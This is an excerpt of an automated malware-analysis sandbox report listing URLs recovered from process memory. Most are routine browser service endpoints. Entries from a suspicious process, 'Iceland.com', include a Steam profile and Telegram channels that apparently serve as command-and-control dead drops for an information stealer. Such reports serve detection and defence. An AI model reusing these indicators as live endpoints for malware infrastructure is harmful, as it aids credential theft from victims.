Source: chrome.exe, 00000018.00000002.2721017519.00002EA800920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusEnabled_UnPinned_NewTab_202309180=
Source: chrome.exe, 00000018.00000002.2721017519.00002EA800920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusP
Source: chrome.exe, 00000018.00000002.2720934521.00002EA8008D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/uploadcompanion-iph-blocklisted-page-urlsexps-registration-success-page-u
Source: chrome.exe, 00000018.00000003.2675521289.000054DC022C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
Source: chrome.exe, 00000018.00000002.2722598019.000054DC00358000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lensgoogle.com/v3/upload
Source: chrome.exe, 00000018.00000002.2722150471.000054DC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 00000018.00000002.2729196399.000054DC00CF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/
Source: chrome.exe, 00000018.00000002.2724063973.000054DC00729000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2725233523.000054DC00997000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/:
Source: chrome.exe, 00000018.00000002.2722915743.000054DC0046C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2687341680.000054DC02AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?tab=rm&ogbl
Source: chrome.exe, 00000018.00000002.2733200663.000054DC01188000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2724063973.000054DC00729000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2729196399.000054DC00CF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2725233523.000054DC00997000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 00000018.00000002.2729196399.000054DC00CF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapprTymous
Source: chrome.exe, 00000018.00000002.2724063973.000054DC00729000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2725233523.000054DC00997000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/J
Source: chrome.exe, 00000018.00000002.2721671516.000054DC000EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2733200663.000054DC01188000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2724063973.000054DC00729000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2725233523.000054DC00997000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2732200140.000054DC01048000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: chrome.exe, 00000018.00000002.2732200140.000054DC01048000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_defaultT
Source: msedge.exe, 00000024.00000002.3053691246.00005E34002C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://msn.cn/
Source: msedge.exe, 00000024.00000002.3053691246.00005E34002C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://msn.com/
Source: chrome.exe, 00000018.00000002.2724481612.000054DC007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2732336841.000054DC01064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2723167042.000054DC00544000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 00000018.00000002.2731827074.000054DC00FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2722965164.000054DC004C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2724440969.000054DC007A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 00000018.00000002.2731827074.000054DC00FAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacyf
Source: chrome.exe, 00000018.00000002.2722965164.000054DC004C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2724440969.000054DC007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2724139396.000054DC00730000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 00000018.00000003.2675521289.000054DC022C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/shielded-email2B
Source: chrome.exe, 00000018.00000002.2724440969.000054DC007A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 00000018.00000002.2722417752.000054DC002F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2725952384.000054DC00A30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myactivity.google.com/
Source: powershell.exe, 00000003.00000002.2106520526.000001A501977000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2123581484.000001A510071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: chrome.exe, 00000018.00000002.2722075742.000054DC001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 00000018.00000002.2722150471.000054DC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: msedge.exe, 00000024.00000002.3053691246.00005E34002C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://office.net/
Source: chrome.exe, 00000018.00000003.2687341680.000054DC02AFC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2686937431.000054DC02B64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogads-pa.googleapis.com
Source: chrome.exe, 00000018.00000002.2732625729.000054DC01082000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.goog
Source: chrome.exe, 00000018.00000003.2697556642.000054DC02270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 00000018.00000003.2687341680.000054DC02AFC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2686937431.000054DC02B64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
Source: chrome.exe, 00000018.00000003.2687341680.000054DC02AFC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2686937431.000054DC02B64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/callout?eom=1
Source: chrome.exe, 00000018.00000003.2676206596.000054DC012FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2732277854.000054DC01058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2729996442.000054DC00DE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2733579300.000054DC012FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2643818231.000054DC00A70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2646002409.000054DC0103C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2732073371.000054DC0103C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000018.00000002.2728069443.000054DC00C1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2732073371.000054DC0103C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000018.00000002.2732277854.000054DC01058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2643818231.000054DC00A70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2646002409.000054DC0103C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2732073371.000054DC0103C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 00000018.00000003.2676206596.000054DC012FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2733579300.000054DC012FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2646002409.000054DC0103C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2730134293.000054DC00E29000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2732073371.000054DC0103C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 00000018.00000002.2732277854.000054DC01058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2643818231.000054DC00A70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2646002409.000054DC0103C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2732073371.000054DC0103C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000018.00000003.2676206596.000054DC012FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2733579300.000054DC012FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2643818231.000054DC00A70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2646002409.000054DC0103C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2730134293.000054DC00E29000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2732073371.000054DC0103C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2722383799.000054DC002D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000018.00000002.2729996442.000054DC00DE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2643818231.000054DC00A70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2646002409.000054DC0103C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2732073371.000054DC0103C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000018.00000002.2728069443.000054DC00C1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2732073371.000054DC0103C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 00000018.00000002.2723098696.000054DC00514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: msedge.exe, 0000001C.00000003.2778651450.00003D1802474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2778137040.00003D1802470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000020.00000003.2887233804.0000469C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978887050.00005E340026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978784390.00005E3400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978711761.00005E3400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/AddSession
Source: msedge.exe, 0000001C.00000003.2778651450.00003D1802474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2778137040.00003D1802470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000020.00000003.2887233804.0000469C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978887050.00005E340026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978784390.00005E3400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978711761.00005E3400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/Logout
Source: msedge.exe, 00000020.00000003.2887233804.0000469C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978887050.00005E340026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978784390.00005E3400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978711761.00005E3400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/LogoutYxAB
Source: msedge.exe, 0000001C.00000003.2778651450.00003D1802474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2778137040.00003D1802470000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
Source: msedge.exe, 0000001C.00000003.2778651450.00003D1802474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2778137040.00003D1802470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000020.00000003.2887233804.0000469C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978887050.00005E340026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978784390.00005E3400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978711761.00005E3400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/MergeSession
Source: msedge.exe, 0000001C.00000003.2778651450.00003D1802474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2778137040.00003D1802470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000020.00000003.2887233804.0000469C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978887050.00005E340026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978784390.00005E3400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978711761.00005E3400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/OAuthLogin
Source: msedge.exe, 0000001C.00000003.2778651450.00003D1802474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2778137040.00003D1802470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000020.00000003.2887233804.0000469C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978887050.00005E340026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978784390.00005E3400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978711761.00005E3400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
Source: msedge.exe, 0000001C.00000003.2778651450.00003D1802474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2778137040.00003D1802470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000020.00000003.2887233804.0000469C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978887050.00005E340026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978784390.00005E3400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978711761.00005E3400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
Source: msedge.exe, 0000001C.00000003.2778651450.00003D1802474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2778137040.00003D1802470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000020.00000003.2887233804.0000469C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978887050.00005E340026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978784390.00005E3400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978711761.00005E3400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
Source: msedge.exe, 0000001C.00000003.2778651450.00003D1802474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2778137040.00003D1802470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000020.00000003.2887233804.0000469C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978887050.00005E340026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978784390.00005E3400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978711761.00005E3400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
Source: msedge.exe, 0000001C.00000003.2778651450.00003D1802474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2778137040.00003D1802470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000020.00000003.2887233804.0000469C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978887050.00005E340026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978784390.00005E3400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978711761.00005E3400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
Source: msedge.exe, 0000001C.00000003.2778651450.00003D1802474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2778137040.00003D1802470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000020.00000003.2887233804.0000469C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978887050.00005E340026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978784390.00005E3400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978711761.00005E3400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
Source: msedge.exe, 0000001C.00000003.2778651450.00003D1802474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2778137040.00003D1802470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000020.00000003.2887233804.0000469C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978887050.00005E340026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978784390.00005E3400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978711761.00005E3400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
Source: msedge.exe, 0000001C.00000003.2778651450.00003D1802474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2778137040.00003D1802470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000020.00000003.2887233804.0000469C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978887050.00005E340026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978784390.00005E3400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978711761.00005E3400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
Source: msedge.exe, 0000001C.00000003.2778651450.00003D1802474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2778137040.00003D1802470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000020.00000003.2887233804.0000469C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978887050.00005E340026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978784390.00005E3400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978711761.00005E3400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
Source: chrome.exe, 00000018.00000002.2722417752.000054DC002F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2725952384.000054DC00A30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: chrome.exe, 00000018.00000003.2646237242.000054DC0040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2646350603.000054DC0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2646465243.000054DC0126C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
Source: chrome.exe, 00000018.00000002.2725952384.000054DC00A30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 00000018.00000003.2675521289.000054DC022C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
Source: chrome.exe, 00000018.00000003.2675521289.000054DC022C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
Source: chrome.exe, 00000018.00000003.2675521289.000054DC022C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000018.00000003.2675521289.000054DC022C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
Source: chrome.exe, 00000018.00000003.2675521289.000054DC022C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000018.00000002.2721453013.000054DC0008C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 00000018.00000002.2721597902.000054DC000B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: chrome.exe, 00000018.00000002.2722075742.000054DC001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 00000018.00000003.2675521289.000054DC022C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.com2
Source: chrome.exe, 00000018.00000003.2675521289.000054DC022C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.comJv
Source: chrome.exe, 00000018.00000002.2723098696.000054DC00514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2724673902.000054DC0081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2732200140.000054DC01048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2724723078.000054DC0083C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000018.00000002.2723098696.000054DC00514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2724673902.000054DC0081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2732200140.000054DC01048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2724723078.000054DC0083C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: chrome.exe, 00000018.00000002.2722267806.000054DC002A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: chrome.exe, 00000018.00000002.2722915743.000054DC0046C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2687341680.000054DC02AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
Source: Iceland.com, 00000015.00000002.3337432353.0000000003FF0000.00000004.00000800.00020000.00000000.sdmp, Iceland.com, 00000015.00000002.3335415004.000000000177F000.00000004.00000020.00020000.00000000.sdmp, Iceland.com, 00000015.00000003.2446949939.000000000171B000.00000004.00000020.00020000.00000000.sdmp, Iceland.com, 00000015.00000003.2446545610.00000000016F7000.00000004.00000020.00020000.00000000.sdmp, Iceland.com, 00000015.00000003.2446576253.0000000004015000.00000004.00000800.00020000.00000000.sdmp, Iceland.com, 00000015.00000002.3341880599.00000000042F1000.00000040.00001000.00020000.00000000.sdmp, Iceland.com, 00000015.00000003.2446692096.00000000042F3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199809363512
Source: Iceland.com, 00000015.00000003.2446692096.00000000042F3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199809363512m0nk3Mozilla/5.0
Source: Iceland.com, 00000015.00000002.3347506907.0000000006B87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Iceland.com, 00000015.00000002.3347506907.0000000006B87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Iceland.com, 00000015.00000003.2446436939.0000000001797000.00000004.00000020.00020000.00000000.sdmp, Iceland.com, 00000015.00000003.2446404476.00000000016F7000.00000004.00000020.00020000.00000000.sdmp, Iceland.com, 00000015.00000003.2446667897.0000000001797000.00000004.00000020.00020000.00000000.sdmp, Iceland.com, 00000015.00000003.2446622955.00000000017B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.m
Source: Iceland.com, 00000015.00000002.3334799406.00000000016AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: Iceland.com, 00000015.00000002.3334799406.00000000016AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/A
Source: Iceland.com, 00000015.00000003.2446436939.0000000001797000.00000004.00000020.00020000.00000000.sdmp, Iceland.com, 00000015.00000003.2446404476.00000000016F7000.00000004.00000020.00020000.00000000.sdmp, Iceland.com, 00000015.00000003.2446667897.0000000001797000.00000004.00000020.00020000.00000000.sdmp, Iceland.com, 00000015.00000003.2446622955.00000000017B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/k04
Source: Iceland.com, 00000015.00000002.3335415004.00000000017C0000.00000004.00000020.00020000.00000000.sdmp, Iceland.com, 00000015.00000003.2446545610.00000000016F7000.00000004.00000020.00020000.00000000.sdmp, Iceland.com, 00000015.00000002.3341880599.000000000433D000.00000040.00001000.00020000.00000000.sdmp, Iceland.com, 00000015.00000003.2446576253.0000000004015000.00000004.00000800.00020000.00000000.sdmp, Iceland.com, 00000015.00000002.3341880599.00000000042F1000.00000040.00001000.00020000.00000000.sdmp, Iceland.com, 00000015.00000003.2446692096.00000000042F3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/k04ael
Source: Iceland.com, 00000015.00000003.2446692096.00000000042F3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/k04aelm0nk3Mozilla/5.0
Source: Iceland.com, 00000015.00000002.3335415004.00000000017C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/k04aelv
Source: chrome.exe, 00000018.00000002.2726269890.000054DC00A7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 00000018.00000002.2722075742.000054DC001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tasks.googleapis.com/
